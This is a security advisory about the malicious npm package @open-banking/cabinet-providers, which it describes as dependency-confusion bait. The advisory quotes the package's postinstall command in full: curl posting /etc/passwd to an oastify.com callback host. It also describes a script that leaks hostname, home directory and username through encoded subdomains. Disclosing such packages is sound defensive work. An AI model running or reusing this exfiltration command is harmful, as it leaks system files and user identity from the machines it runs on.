VYPR

npm · Malicious package advisory

Malware

@open-banking/cabinet-providers

MAL-2026-5392

Malicious code in @open-banking/cabinet-providers (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (376acc0a3b29a3d768a5be7ea618329182989929f9e31fac8c176836b7c4b280)
@open-banking/cabinet-providers@999.9.5 is a dependency-confusion bait package (anomalously high version under a generic scope) that exfiltrates installer data via its postinstall lifecycle. package.json declares `"postinstall": "node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com"`, which posts the contents of `/etc/passwd` (prefixed by the installer's hostname as a subdomain) to a Burp Collaborator (OAST) endpoint. The bundled `scripts/scream3gg.js` hex-encodes `os.hostname()`, `os.homedir()`, and `os.userInfo().username`, splits the result into 50-character chunks joined by `.`, and fetches `http://<chunks>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com` over plain HTTP — leaking host identity through DNS-style subdomain encoding. Both behaviors fire automatically on `npm install` with no user consent.

Compromised versions (2)

  • 999.9.2
  • 999.9.5

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.